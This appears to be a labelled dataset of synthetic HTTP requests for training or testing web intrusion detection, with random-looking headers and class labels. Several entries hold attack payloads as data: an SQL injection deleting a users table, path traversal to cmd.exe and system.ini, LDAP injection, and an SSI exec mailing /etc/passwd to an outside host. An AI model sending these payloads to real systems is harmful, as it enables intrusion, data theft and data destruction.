Upgrade: iercSi/3.4, rnry/0.4, onpiw/4.8, bhtr/3.8
Warning: 199 www.itOetlsd.tiff "wotper5eMaRnsi3mHstd" "Sun, 18 May 08 03:17:26 CET"
X-Forwarded-For: 162.47.119.236
X-Serial-Number: 698228
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 15792
Start - Id: 13920
class: Valid
GET /VstylejV8KXWxml0pIvbscript/iLdA.w9aU0LNxylsa/sdtZhhu/HXreplace3ws7N./Isyty1etdol/6O5RX2/lIYZFNCHbphpaj/tnosa1zli.msf?4re5hoqueea7nEi=gho8_Sl8N&9qnechjb4=6h1nasmqh7&KARNbxfHjZ1perl=nRwoionIliig&mq48gH=%3Blerm%7Crmei&QWRk=ia%3Bc5Toy%28li&eeiwlstEf=c3t&6e9Pnger=4226647908&nullalibepl-5Ag=tbXiAJ HTTP/1.1
Host: 215.127.113.109
Connection: keep-alive
Accept: */*;q=0.1
Accept-Charset: x-mac-arabic, macintosh
Accept-Encoding: *
Accept-Language: *
Cache-Control: mim3Ae=nNh6xan8
Client-ip: 179.61.107.5
Cookie: trdevgiroeemtse=[vT8tsfthome;iuhahiac46=n9ofT;lUM4e8VT=autoexecct8leservicest<os;rt65u=irrniddehedeleeeCn
Cookie2: $Version="89"
Date: Wed, 04 Feb 04 15:34:45 CET
ETag: "6Wsvh5DqVLYnPwZ9mGh."
Expect: rte7T
From: mshmtny@eieiosii.fr
If-Modified-Since: Tue, 27 Jan 09 06:21:22 GMT
If-Unmodified-Since: Sat, 22 Nov 08 24:46:52 UTC
If-Match: *
If-None-Match: "oX2en8qxKmOQRVycM6F"
If-Range: Sun, 16 Oct 05 03:48:59 GMT
Max-Forwards: 2
MIME-Version: 0.9
Pragma: b=r
Proxy-Authorization: Digest response="20C90f08eaa20Ae6068cffEEf4e0aDbb"
Authorization: NTLM cGFldXFveG5udGV1dGVlZDBlbTFsdHMwZXVFb2Vjb3NyaHNoaGFpUzFqYVJlb2Fs
Range: 868-9,0-
Referer: http://ap3ss.gov/Oprsr/9xs2/otTne.tiff
TE: trailers
Trailer: User-Agent
User-Agent: n81mnmmoqc/5.3
UA-CPU: MIPS
UA-Disp: 215,5211,32
UA-OS: Win95
UA-Color: color32
UA-Pixels: 5557x706
Via: 8.0 213.98.48.185:79177
Transfer-Encoding: compress
Upgrade: cai/2.6, gufR/8.6, trrhf/5.6
Warning: 383 www.ueaiuSji.js:995 "arheybgekoaoT" "Thu, 12 Feb 09 08:30:25 UTC"
X-Forwarded-For: 144.135.40.157
X-Serial-Number: 023229886351818841
----: --------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 13920
Start - Id: 37831
class: LdapInjection
GET /j-cEy4IM/sfem/lrbhT4alzlCyoaiar/bufINbGebDl@-/lNvnuS9JTlsr/XF1kautoexec/ajenjmcatZDU/hoclom/am332lTzQ-uaHS_o1jU/formP.jpeg?wourstmee=di4ltEdl&fiAstvIemj=lNfif&4GNON7=d-%40SLU&JDnull8bt=3&qioo=8&oRolHoveji=37&jZw-htaccesrstP=mXpQzA&f3ovUiwaEf9oeF=nonak%29%28+++%7C++%28day%3D*%29&OUshessrltNaos=0824596719&rEdd=9615680&oioeo1l=67&sIrst4gudpOeea=ta%3A&3to=4781775271&dmgMebz=plizsdUaofzp&_v31Dncy9=68 HTTP/1.1
Host: www.wheugArb.com:59569
Connection: close
Accept: */*
Accept-Charset: windows-1254;q=0.2, x-mac-cyrillic;q=0.7, x-mac-arabic, euc-cn;q=0.0, utf-8
Accept-Encoding: 
Accept-Language: *
Cache-Control: max-stale=3
Client-ip: 190.105.3.90
Cookie: rs=830630;Sintm7ureatte8u=oaa3XE42s;codrhlanoTo=ni1TbjWrnte
Cookie2: $Version="89"
Date: Sat, 08 Jul 06 02:54:27 GMT
ETag: W/"7bZNocxT.N2HZG9O"
Expect: 100-continue
From: utTT@sw41.ch
If-Modified-Since: Tue, 15 May 07 07:37:27 CET
If-Unmodified-Since: Mon, 24 Aug 09 06:15:06 CET
If-Match: "NicbM4cEVa4yWhGT"
If-None-Match: *
If-Range: "EMJqZO.82YVLxrXaLI"
Max-Forwards: 52
MIME-Version: 6.6
Pragma: igernt='u'
Proxy-Authorization: Basic MWU3Ym9hOmx0ZWllam8=
Authorization: NTLM eXR5NXVlbHFzZU5vd3luUkVpdHJpZW1kZU9rZHplZXl3c3o1Z2d0b2l0aUQxbg==
Range: 09106-2,27777-,7807-
Referer: http://www.eonlrru.st/Tar1/Ruitgiov/Dg2yt.png
TE: deflate,trailers,deflate
Trailer: Accept
User-Agent: t6O5Sd http://www.oe42n.cz
UA-CPU: 68000
UA-Disp: 780,4386,32
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 2010x029
Via: 8.5 219.117.54.210, 4.0 214.42.120.171
Transfer-Encoding: identity
Upgrade: msdjj/6.3, nhneNR/6.0, amsilt/6.3
Warning: 166 78.105.41.24 "sewleo7lheo" "Tue, 16 Jun 09 20:36:56 UTC"
X-Forwarded-For: 178.127.38.107
X-Serial-Number: 839362517955093673
----: -------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37831
Start - Id: 41464
class: SqlInjection
PUT /6_CPN/wdpeqialr5sRg7InA/oaqieoN8satcvumtmE/Bd/tsa/gbgsoundRWfJf.bin? HTTP/1.0
Content-Length: 255
Content-Language: are5,aeishe
Content-Encoding: compress
Content-Location: /hhaiuti.bin
Content-MD5: U2VyaXN4c25iYWVhc2VoVw==
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 16 Oct 09 14:48:47 GMT
Last-Modified: Tue, 25 Oct 05 15:57:08 GMT
Host: www.o0El.fr
Connection: oedIu
Accept: text/*;q=0.5, application/*, application/postscript
Accept-Charset: iso-8859-15, iso-8859-8;q=0.8, iso-8859-3;q=0.6, x-mac-hebrew, iso-8859-6;q=0.3
Accept-Encoding: deflate;q=0.4, deflate;q=0.7, compress, gzip, gzip;q=0.4
Accept-Language: ecgp-tde3ig, DhtE-1pcr;q=0.5
Cache-Control: esyaocee='8'
Client-ip: 239.178.65.165
Cookie: hev=12282;Yh0bc=3;ct9=sr9u>;LsstoLZrtosbpdr=3;rm=9bainljietaldss;aqy=i zes?eacz egijr6p
Cookie2: $Version="83"
Date: Mon, 09 Aug 04 13:49:37 UTC
ETag: "sthKhUmpoIefQLam-l"
Expect: ttsRiz
From: utrstns@Temsn.st
If-Modified-Since: Thu, 09 Dec 04 03:52:25 CET
If-Unmodified-Since: Thu, 04 Aug 05 03:44:54 UTC
If-Match: *
If-None-Match: *
If-Range: "UbG5__RPqPq93ys"
Max-Forwards: 71
MIME-Version: 2.7
Pragma: m=enOahsq
Proxy-Authorization: Basic aGYzaWVvOkZhbGxrcw==
Authorization: Basic cndpdDo3MHNqYXc=
Range: 863-,45-,1-
Referer: http://www.nsyltzv.it/eedEl.png
TE: trailers,deflate;q=0.4,trailers
Trailer: Range
User-Agent: kPmHsQjd http://www.ratok.it
UA-CPU: MIPS
UA-Disp: 338,3350,8
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 054x8213
Via: FTP/9.0 157.134.148.92
Transfer-Encoding: gzip
Upgrade: EorNU/7.3, mot/1.8
Warning: 500 www.ahpvda.gif "wpsouzhnbeu6jkz5A" "Sat, 07 Oct 06 04:07:23 UTC"
X-Forwarded-For: 12.79.200.187
X-Serial-Number: 40748942
----: -------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~

1-NaEctAb=passthruanaCagmu=e&et0hy=rhwo6lrfn5rmitca&ueMw='   );    delete  from users;    commit; dummy( '&SwEeqbrd7ei=hgn ti~ihoa& e[Ncmdc h&aale=tivA&aunKsbnenbty=h)l&cer8a=itlh&xLWe=7380979&yXthtdineelo=atyn supdate>9l~|pt

End - Id: 41464
Start - Id: 17031
class: Valid
GET /1C@rQwVqBXgmD2/w1XhEgEA4JQ3c/trkgtitgeief/abQvxRX8C8WBo2gyx0_p/@catdlog8evalX/eTutihatriGuyns/5nph-wiobCHonrm/baes/d9PB-f.pl?SdcI=9480&9Neir=ldTnj4i8&ito3ce0hyifo=S4f&99dcoe=05420&oIoli=5424&sock_streamxx2mx=AaiedsjdcnuohiatB&hdbu=021&a2po=44197750 HTTP/1.0
Host: www.eooaeNsa2.net:80
Connection: close
Accept: */*
Accept-Charset: x-mac-icelandic, windows-874;q=0.2
Accept-Encoding: compress;q=0.5, deflate, gzip;q=0.4, compress;q=0.2, deflate;q=0.4
Accept-Language: *;q=0.9
Cache-Control: no-store
Client-ip: 35.215.67.128
Cookie: elfehnebsatifmz=oJbsasjn2HJf
Cookie2: $Version="7"
Date: Wed, 13 May 09 02:33:19 CET
ETag: W/"mbM4Q5pZuXGEl0e.UYh"
Expect: retsau=lide4H;j5ygr7Xm
From: vdhr@pcsof.ch
If-Modified-Since: Mon, 15 Aug 05 18:56:58 UTC
If-Unmodified-Since: Fri, 04 Aug 06 20:05:26 GMT
If-Match: "d_FfbvrMZHniE8t"
If-None-Match: "3S@rcLtS4hhiDcI4"
If-Range: Sat, 02 Jan 10 12:53:30 GMT
Max-Forwards: 44
MIME-Version: 3.6
Pragma: no-cache
Proxy-Authorization: etoT lefruaR=btta3nc
Authorization: 5ngobc 5ydj=hedwd5ta
Range: 9605-9
Referer: http://iuaiI.ch/bwnomomh/kteneirn.swf
TE: trailers,deflate,trailers
Trailer: Accept
User-Agent: Mozilla/8.4 (Windows; U; Win 9x 5.9; rt-1n; rv:7.7.8) Gecko/58698899
UA-CPU: PowerPC
UA-Disp: 7236,439,32
UA-OS: Win98
UA-Color: color16
UA-Pixels: 486x328
Via: 6.9 www.hlarS.htm
Transfer-Encoding: deflate
Upgrade: 2dsxif/4.8, DkeRu/7.0, doebe/0.4, thiwnu/1.1
Warning: 748 211.185.9.15 "1tesO3h" "Fri, 30 Nov 07 14:52:33 UTC"
X-Forwarded-For: 3.82.91.139
X-Serial-Number: 380344
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~

null

End - Id: 17031
Start - Id: 25744
class: Valid
GET /dev2b-YnkUM45cmWbEks/ka/ulkaPkjY6JJo30Z@n11/J3QLilVOx4cmd/fK/lW@k37HOk4z1slnaG/FJT50cm1c6y9Pmw.html? HTTP/1.0
Host: 183.217.19.130:3346
Connection: close
Accept: audio/*;q=0.3, image/*
Accept-Charset: x-mac-cyrillic;q=0.3, euc-jp;q=0.1, x-mac-arabic
Accept-Encoding: 
Accept-Language: ueih-dait, h-scpexet;q=0.5, esm-dea8eier;q=0.9, tltia3sn-edys7lbd;q=0.7
Cache-Control: only-if-cached
Client-ip: 32.43.147.96
Cookie: iagvttrr4oe=97829;sdg=ah;UxtCs7tue=08907147;eto=nqaYUh;SnnErlda=7418448;esrtetrhoe=2124767
Cookie2: $Version="38"
Date: Sat, 20 Nov 04 06:44:35 UTC
ETag: W/"Hd49XJxD5aG5izO-T"
Expect: 100-continue
From: Aboesy@tnEn1d.uk
If-Modified-Since: Wed, 07 Jan 04 19:03:11 UTC
If-Unmodified-Since: Wed, 14 Jan 09 22:43:27 CET
If-Match: "jJFIsq6nyU0BzBB"
If-None-Match: *
If-Range: Mon, 16 Jun 08 14:49:01 GMT
Max-Forwards: 42
MIME-Version: 9.6
Pragma: no-cache
Proxy-Authorization: Basic aW5paHQ6ZW5uOQ==
Authorization: 4tata 2n7Qns=bDaf64
Range: 03-
Referer: /fioaqej6/iees/zzyoq58e/ii3nx0gz.bin
TE: trailers
Trailer: User-Agent
User-Agent: fr0lKc1 http://www.qiQnqds.org
UA-CPU: PowerPC
UA-Disp: 7894,3200,8
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 7472x595
Via: FTP/7.1 www.oldaa.jpg
Transfer-Encoding: identity
Upgrade: ceULo/2.9, itmu/9.5, m6nr5/9.3
Warning: 635 www.9ejeStqe.htm "8o9arHalg5mnumiio9o" "Sat, 25 Oct 08 24:03:25 UTC"
X-Forwarded-For: 1.21.31.218
X-Serial-Number: 896516230785
----: ---------------------------
~~~~~: ~~~~~~~~~~

null

End - Id: 25744
Start - Id: 23892
class: Valid
GET /sP-0/aDFk68QQQVfp827/tP1PMVp/samVESWwc/th/eezYRW-@npbJJgeS1x.shtml? HTTP/1.0
Host: 99.155.200.151
Connection: itesa
Accept: image/jpeg;q=0.1, image/gif;q=0.2, audio/*;q=0.3
Accept-Charset: *;q=0.8
Accept-Encoding: 
Accept-Language: *
Cache-Control: od8h='o'
Client-ip: 36.165.156.12
Cookie: moV-jsktmpQ=15;KZechoW=dacteliketv;UoarldahiTNosvl=i0Prrcp
Cookie2: $Version="27"
Date: Sun, 10 Apr 05 22:19:40 CET
ETag: "GuFemFcWilipwpw"
Expect: 100-continue
From: nt7rur2b@ieUStzn.biz
If-Modified-Since: Thu, 26 Nov 09 12:28:12 GMT
If-Unmodified-Since: Sat, 11 Jul 09 22:04:44 GMT
If-Match: *
If-None-Match: "RfuZnK3a33LaJfXOT1"
If-Range: Sat, 23 Jan 10 06:15:13 UTC
Max-Forwards: 8
MIME-Version: 0.9
Pragma: no-cache
Proxy-Authorization: Digest qop=auth-int
Authorization: Digest qop=6roi1d
Range: 1-114,-341
Referer: /seoeNX/uhfmc/8Ei76w/sugt.swf
TE: trailers
Trailer: Transfer-Encoding
User-Agent: Mozilla/9.0 (Machintosh; U; Mac OS X 4.2; is-Dw; rv:3.8.1) Gecko/30375469
UA-CPU: Sparc
UA-Disp: 722,7012,8
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 7253x9892
Via: 5.9 www.reidere5.shtml
Transfer-Encoding: compress
Upgrade: zt1s/2.6, mts7/3.4
Warning: 002 www.5girkg.js "MDcrsoovsn9ab8caPt" 
X-Forwarded-For: 87.73.118.107
X-Serial-Number: 32892404874
----: --------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 23892
Start - Id: 1493
class: Valid
GET /yruhosnoyainmp/OY65ftpmailCxQ_hF/skJFBzSdp0CUCm.jpeg?udzwh5otaikiu=havingar+&f6nkhnIjceR1J=s%25from&ritaOi4aj=canzdtiohconnectimendsl HTTP/1.1
Host: www.ECn1Utg5ea.biz
Connection: close
Accept: audio/*, image/png
Accept-Charset: utf-7;q=0.3, iso-8859-7;q=0.0, shift_jis, macintosh, x-mac-icelandic
Accept-Encoding: 
Accept-Language: ur-s;q=0.9, tHtmt-qhurf
Cache-Control: min-fresh=061
Client-ip: 237.35.75.90
Cookie: dytc=encpmbnzYGC;AkmetatdNESLN=h
Cookie2: $Version="5"
Date: Sat, 25 Nov 06 07:23:10 GMT
ETag: "D@8Y0RQMhl0fwBgO0XP"
Expect: icwdgeae=v0ow
From: oimobe@1tardi.ch
If-Modified-Since: Sun, 26 Apr 09 11:45:46 UTC
If-Unmodified-Since: Wed, 10 Nov 04 21:39:25 GMT
If-Match: "VPJDqYtr7HWPEBQ@"
If-None-Match: *
If-Range: *
Max-Forwards: 35
MIME-Version: 9.3
Pragma: no-cache
Proxy-Authorization: NTLM c2V4bTc0c2Q4Y2czRWRoaG9pZGV0cGRyOWs4c2Rjc3RhdGVvbWl0NA==
Authorization: iega zmft5c=asc4
Range: 7448-
Referer: http://www.5dcttaa.gov/s1Dc/easrunr/zAo8emob.cfm
TE: trailers,trailers
Trailer: If-None-Match
User-Agent: 0arlk/8.3.5
UA-CPU: MIPS
UA-Disp: 7926,709,32
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 1994x755
Via: 7.8 205.244.15.107
Transfer-Encoding: i0ot0
Upgrade: S6gk/9.9, Aoe/4.0
Warning: 397 www.hrewoe.tiff "adPeaio" "Thu, 04 Sep 08 08:58:04 CET"
X-Forwarded-For: 234.233.233.38
X-Serial-Number: 894892
----: -----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 1493
Start - Id: 44000
class: OsCommanding
GET /images/.%2e/.%2e/.%2e/.%2e/winnt/system32/cmd.exe?/c+dir HTTP/1.0
Host: 60.163.26.100
Connection: close
Accept: */*;q=0.0
Accept-Charset: *;q=0.8
Accept-Encoding: *
Accept-Language: *
Cache-Control: no-transform
Client-ip: 89.252.55.156
Cookie: 1ewlrje=8ibbtftpayvsin t
Cookie2: $Version="691"
Date: Fri, 27 Oct 06 04:10:32 GMT
ETag: "WKKEhSDEdJpn_XZ.E"
Expect: inTns
From: 44fa@mshrPyo.gov
If-Modified-Since: Thu, 19 Jan 06 07:19:51 GMT
If-Unmodified-Since: Sun, 31 Oct 04 13:16:19 GMT
If-Match: "US6yND.1@Sd7N1n"
If-None-Match: *
If-Range: Sun, 03 Jul 05 15:52:00 CET
Max-Forwards: 3081
MIME-Version: 9.9
Pragma: 9=tyhewA
Proxy-Authorization: Qyeeu qzNllaee=zsachi
Authorization: Basic aW1lT2U6aWdzbm51a2g=
Range: 3-
Referer: /1onpm/lob9/easz/aaenf.asp
TE: trailers,deflate;q=0.3
Trailer: Host
User-Agent: jEKXbROB http://www.olsonq.cz
UA-CPU: x86
UA-Disp: 402,257,32
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 5667x180
Via: 5.8 www.tewEea.css, todlmg/2.7 www.npftx6ut.jpg
Transfer-Encoding: gzip
Upgrade: tIrc/4.2
Warning: 170 126.27.186.211 "do3kdsikezlS" "Fri, 29 May 09 15:50:00 UTC"
X-Forwarded-For: 55.100.34.25
X-Serial-Number: 337660
----: -------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44000
Start - Id: 8187
class: Valid
GET /ksiteo/lTwwVGbe_E9Q7RRppJNN/ifdsesTEE9d/ese9ia/oceecOsaaexe/e2d1APe7s5QlH6K3n/pgfntgfpkwk.css? HTTP/1.0
Host: 7.238.232.211:51091
Connection: close
Accept: video/quicktime;q=0.0, text/*;q=0.8, text/*;q=0.9
Accept-Charset: *
Accept-Encoding: 
Accept-Language: ssutya-bDh;q=0.1, armgFs-Cvc, sofie-shgneamf;q=0.4, y1-sle
Cache-Control: no-store
Client-ip: 110.38.97.95
Cookie: OKbetweenPTm=e__TYkRJUkkV;Itigt1sae=6;a5El=weir;e8rs=u2ofsltdlof2Ni
Cookie2: $Version="2"
Date: Sun, 01 Feb 09 24:21:02 CET
ETag: "CJ2FHvY_yVxe4mme"
Expect: cah1n=aakpb9;omly
From: lncsrs1@ssri.net
If-Modified-Since: Wed, 25 Jul 07 16:34:11 CET
If-Unmodified-Since: Thu, 26 Aug 04 21:57:25 CET
If-Match: *
If-None-Match: ".4HTh9fWUvSL@0x."
If-Range: "b8GLjyVIWsFJCdO59"
Max-Forwards: 6
MIME-Version: 4.7
Pragma: no-cache
Proxy-Authorization: Basic cW5kcm5pOmdzaWFn
Authorization: Digest opaque="ieailsa"
Range: -635
Referer: /ert03n/ipzA.txt
TE: deflate;q=0.1,trailers
Trailer: If-Range
User-Agent: Mozilla/8.9 (compatible; MSIE 8.6; WinNT; hagqw; 0elajaEd1)
UA-CPU: StrongARM
UA-Disp: 260,910,32
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 1852x378
Via: 7.0 www.gmehjlol.jpg
Transfer-Encoding: identity
Upgrade: epnli/5.9
Warning: 689 128.202.115.69 "ilceonto6elpOdo9ca" "Thu, 24 Jun 04 13:57:23 UTC"
X-Forwarded-For: 93.63.20.222
X-Serial-Number: 81045574594520616
----: ----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 8187
Start - Id: 40210
class: SSI
PUT /etwXotq/d9ii7nes32i/Yk.jpeg? HTTP/1.0
Content-Length: 79
Content-Language: dsoth,u,rn
Content-Encoding: identity
Content-MD5: YTVzYzVsZW5hY3Jzc2tFcA==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 30 Sep 08 12:18:42 UTC
Host: 54.101.68.79:80
Connection: keep-alive
Accept: */*;q=0.4
Client-ip: 140.252.205.166
Cookie2: $Version="2"
Date: Sun, 22 Nov 09 08:55:15 GMT
If-None-Match: "E4dqfqG.124ieO1gS"
If-Range: "M0c41aG4BW.wpPCQTc"
Max-Forwards: 918
Pragma: mzR='1'
Referer: /si6ulwne.dll
User-Agent: <!-- #exec  cmd="/bin/mail     rpehlro.com < /etc/passwd"-->
UA-OS: Windows 95
Transfer-Encoding: deflate

isn=71Ps5iKSWxI&srpKrwHdcor=ifdiv9eto&toelcehne=ahaTlE8j6h3igMx&w3hzxee=1989362

End - Id: 40210
Start - Id: 36094
class: PathTransversal
GET /Y1sam-OxxUDFtF-/Hji1U@.rc_ASa/ahecesdtt2/hi/rHiw.QEI@rFlcMG.msf?nhejamlbynefe=%5CWINDOWS%5Csystem.ini&tHmmutsla=iveau&ngcgemeiSldo2cE=fGe%7Cde&9ya=asaR&niEkiares=styleh%3F5ri8o%3E3teaes+aaa&Iexsa1p=825&ssinc1htvxa=42261929&7a3sd=9&kAY3Ep1llCvT=dQybb%40&H6ouQJt=r1ernifreplaceul0aaoA&8O4ds=8Ji42yg&C3gCcRt=aW963L0I4iue&mhe=423596 HTTP/1.1
Host: www.bCOne.biz
Connection: close
Accept: text/plain;q=0.7, text/html
Accept-Charset: *
Accept-Encoding: *;q=0.9
Accept-Language: RTde-dyA;q=0.2, rsN8-Ehttyn;q=0.0, prhNaN-i;q=0.1
Cache-Control: xh=laa8
Client-ip: 142.104.22.126
Cookie: halupuchyg=30736;TOdgYC=0;UFUr1-vJxu=l9Q_F@oC;esptoho0Nsdea5=831467;eectoydnso=4;bqeqtAsRe=48429145
Cookie2: $Version="56"
Date: Thu, 25 Nov 04 03:09:02 CET
ETag: W/"Y2c3Smyqo1dEDpGFg_"
Expect: 6dnisV=mDiz2b;TEra=sdtlg7e
From: 2srfon@a2wsst04Ft.cz
If-Modified-Since: Mon, 25 Oct 04 20:58:02 UTC
If-Unmodified-Since: Thu, 15 Apr 10 05:41:04 UTC
If-Match: "MDwp30OG_wU6epQb"
If-None-Match: *
If-Range: "LJXpsVhHO5-5hS.XC3"
Max-Forwards: 8933
MIME-Version: 3.5
Pragma: DjRsrf=5giir
Proxy-Authorization: Digest username="ftps"
Authorization: rtt8d pqeoe=bouttla
Range: 78-
Referer: /wnoartS/jnip/dgzi/j4nua/mzwEaT8.msf
TE: gzip,trailers,chunked
Trailer: Pragma
User-Agent: temeoanere0y0Nee2cL7
UA-CPU: Sparc
UA-Disp: 6269,3972,32
UA-OS: FreeBSD
UA-Color: color32
UA-Pixels: 6563x796
Via: 0.3 www.h8tF.jpg
Transfer-Encoding: gzip
Upgrade: Fd1sk/0.3
Warning: 647 231.206.148.64:01 "5tdtn" 
X-Forwarded-For: 76.95.176.105
X-Serial-Number: 521332915
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 36094
Start - Id: 12679
class: Valid
GET /zzKff8y21A/cFT3KPbbNCQ1e1b/aNue/De/euatl7/zcmd/BK6Z-4ta9zNbodyZjR/aeeblzinvnaoaimmb/lOAZ01/thkp/itarqerjk.gif? HTTP/1.1
Host: www.ioeq9hneEf.biz
Connection: njuL
Accept: */*
Accept-Charset: x-mac-chinesetrad;q=0.0, koi8, iso-8859-1, iso-8859-7
Accept-Encoding: gzip, gzip;q=0.5, identity, identity;q=0.5
Accept-Language: eliBwgl6-eg;q=0.5, deon3hd-AR, 4enzhy-udnSihN9
Cache-Control: no-store
Client-ip: 40.108.235.175
Cookie: olff=WnAitdntidid;ny0traA=mcdnmi4Oew;ovty6aNp=4983772154;oe=17
Cookie2: $Version="4"
Date: Sat, 07 Aug 04 02:13:11 GMT
ETag: "Z6bDR6ol6FudYgKgsa"
Expect: 100-continue
From: heour@oeunirs.uk
If-Modified-Since: Sun, 16 Oct 05 20:21:10 GMT
If-Unmodified-Since: Fri, 12 Mar 10 10:09:45 GMT
If-Match: "ZG1kXH-5HZsz7owtU"
If-None-Match: "CmXR38jwHEtLyFU_U."
If-Range: *
Max-Forwards: 5
MIME-Version: 3.8
Pragma: less=1
Proxy-Authorization: Basic bzJtc3RTdDpyc3JnaXB0Tw==
Authorization: hkPedt einsnc=lIImlmc
Range: 123920-
Referer: /chPn3aar/5slMew67/tcoM4.jsp
TE: trailers
Trailer: If-Match
User-Agent: angOea/5.7
UA-CPU: Sparc
UA-Disp: 8687,0336,32
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 118x1271
Via: 5.0 www.Idtezuir.tiff:9797
Transfer-Encoding: identity
Upgrade: sto2/5.6, i35ueo/6.1, obrejt/0.3, it5/7.0, igelon/5.7
Warning: 604 0.169.62.121 "ntoiigc3nubtmi3tnc" 
X-Forwarded-For: 158.192.234.112
X-Serial-Number: 444066878
----: ---------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

null

End - Id: 12679
Start - Id: 33311
class: Valid
PUT /uFVCconnectKLmH.WC/khMuaY/g.N-oB/eh6oeqwobda/eDaeiremnrbiM/lsmetaAlc/ditatfsaesBa/tOQoOXjZJPmQhPtKmwG/tdqoZ74ley/d9JVV6OdPnBac53/dKmLQvvA64/buWJo-qMhE80Api9DdW.nsf? HTTP/1.0
Content-Length: 236
Content-Language: 8,dntdan,titp1pe
Content-Encoding: deflate
Content-Location: /N2se/Rolzi/tcer/cede9.swf
Content-MD5: YW9ldGVlb2VubXRtaXVlbg==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 22 Nov 05 02:52:57 GMT
Last-Modified: Thu, 24 Aug 06 24:13:33 GMT
Host: 5.78.4.176:80439
Connection: keep-alive
Accept: */*
Accept-Charset: *;q=0.4
Accept-Encoding: compress;q=0.8, deflate;q=0.6, compress;q=0.4, identity, compress;q=0.1
Accept-Language: o-eel;q=0.3, h-piv2
Cache-Control: no-store
Client-ip: 228.103.204.107
Cookie: hsepd=hIEjtV;e69Jom6= 
Cookie2: $Version="74"
Date: Mon, 06 Aug 07 01:47:29 UTC
ETag: W/"Z_j.3aNJPw-KPy2.EVt"
Expect: mkhuhn=8bheVe8;ujr7eg
From: rcidi8@tsUeIwinez.net
If-Modified-Since: Sun, 01 May 05 04:52:13 GMT
If-Unmodified-Since: Sat, 08 Aug 09 02:22:29 UTC
If-Match: *
If-None-Match: "W6zAP@IdKT247pAJTaA"
If-Range: Sun, 04 Nov 07 04:30:51 GMT
Max-Forwards: 0768
MIME-Version: 4.1
Pragma: no-cache
Proxy-Authorization: Digest cnonce="dw2tl"
Authorization: NTLM cmw1aG9veGljcmhvdHRoZWxMZG1udjJqaW9uZTduaW1u
Range: 7-
Referer: http://www.ltuncwa.be/teE9auu/mna6e8a/oci9yt/Mp6eIaca.msf
TE: trailers
Trailer: Host
User-Agent: 3eAeuieodn9
UA-CPU: x86
UA-Disp: 6993,500,16
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 8624x050
Via: HTTP/9.9 www.otssnspD.js, HTTP/2.2 250.203.253.100
Transfer-Encoding: identity
Upgrade: 4kds/9.5
Warning: 616 199.196.167.14:2116 "3cwpe" "Sun, 12 Sep 04 19:57:05 GMT"
X-Forwarded-For: 178.187.50.135
X-Serial-Number: 60708366613248509246
----: --------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

shutdownZ1inIV=39&hraritohtjtDr=niacmpoAg&yk=aRqRql&FeHektEAaf=rGto>dnwznEaeR&E9sS7ZechoCi2L=bWcPlBqxQE&rizC1GSbHX=6080&yoseghnhi2wandi=4681&s3rla=i1&tth2eRS=t&htitutn=n0&mt=Tgnsbsroiaonsuh3&eNta2nnh=Nr4&dIet7meE=cjYienxz&ntPu=0471719

End - Id: 33311
Start - Id: 12061
class: Valid
GET /il915/cgsndf3QOw.c@GP/enrgR1/aykpje@LswdAX/st/j9mTu/tiIjFMK82o..cfm?3dis=2&echHUoptBXX=n2siP%3Afbt HTTP/1.1
Host: 86.26.227.230:5
Connection: secyrsNw
Accept: */*
Accept-Charset: windows-1252, cp-950;q=0.0, windows-1253, x-mac-chinesesimp;q=0.5
Accept-Encoding: deflate, identity;q=0.0, gzip;q=0.1
Accept-Language: *;q=0.6
Cache-Control: no-store
Client-ip: 136.168.150.37
Cookie: o1=enh
Cookie2: $Version="7"
Date: Fri, 06 Jan 06 16:59:14 CET
ETag: "u_KgT.wUTCRofOk5@"
Expect: eaa2eh
From: RssG@tca3.de
If-Modified-Since: Fri, 05 Feb 10 16:51:44 UTC
If-Unmodified-Since: Sat, 14 Aug 04 18:04:00 CET
If-Match: "OAqV8xmiB7ptI6CygE"
If-None-Match: "g9WpHPzRELNlbIK3miGU"
If-Range: Sun, 02 Jul 06 05:21:04 UTC
Max-Forwards: 003
MIME-Version: 2.2
Pragma: no-cache
Proxy-Authorization: Digest nc=BD5B8C8A
Authorization: Basic bThBc3NlZXk6ZW5sdA==
Range: 2571-
Referer: /1taisis/oPiasmen.jsp
TE: chunked;q=0.4,chunked;q=0.2
Trailer: Accept-Encoding
User-Agent: cdadhahirarrteibid6e
UA-CPU: 68000
UA-Disp: 859,2266,16
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 701x262
Via: 4.5 210.38.116.3:4587
Transfer-Encoding: identity
Upgrade: eoPrtm/3.6, odfe/2.3, Iorla/2.0, tdlt/6.3
Warning: 813 226.224.5.12 "nenDbioeTeurpj" 
X-Forwarded-For: 149.30.227.159
X-Serial-Number: 21280
----: ----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 12061
Start - Id: 46628
class: XSS
